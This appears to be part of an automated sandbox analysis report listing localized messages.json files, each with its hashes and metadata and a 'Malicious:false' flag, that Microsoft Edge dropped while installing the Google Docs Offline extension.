                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):954
                                                                                        Entropy (8bit):4.631887382471946
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
                                                                                        MD5:1F565FB1C549B18AF8BBFED8DECD5D94
                                                                                        SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
                                                                                        SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
                                                                                        SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\it\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):899
                                                                                        Entropy (8bit):4.474743599345443
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\iw\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2230
                                                                                        Entropy (8bit):3.8239097369647634
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ja\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1160
                                                                                        Entropy (8bit):5.292894989863142
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ka\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):3264
                                                                                        Entropy (8bit):3.586016059431306
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\kk\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):3235
                                                                                        Entropy (8bit):3.6081439490236464
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\km\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):3122
                                                                                        Entropy (8bit):3.891443295908904
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\kn\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1880
                                                                                        Entropy (8bit):4.295185867329351
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
                                                                                        MD5:8E16966E815C3C274EEB8492B1EA6648
                                                                                        SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
                                                                                        SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
                                                                                        SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ko\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1042
                                                                                        Entropy (8bit):5.3945675025513955
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\lo\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2535
                                                                                        Entropy (8bit):3.8479764584971368
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\lt\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1028
                                                                                        Entropy (8bit):4.797571191712988
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\lv\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):994
                                                                                        Entropy (8bit):4.700308832360794
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ml\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2091
                                                                                        Entropy (8bit):4.358252286391144
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\mn\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2778
                                                                                        Entropy (8bit):3.595196082412897
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\mr\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1719
                                                                                        Entropy (8bit):4.287702203591075
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
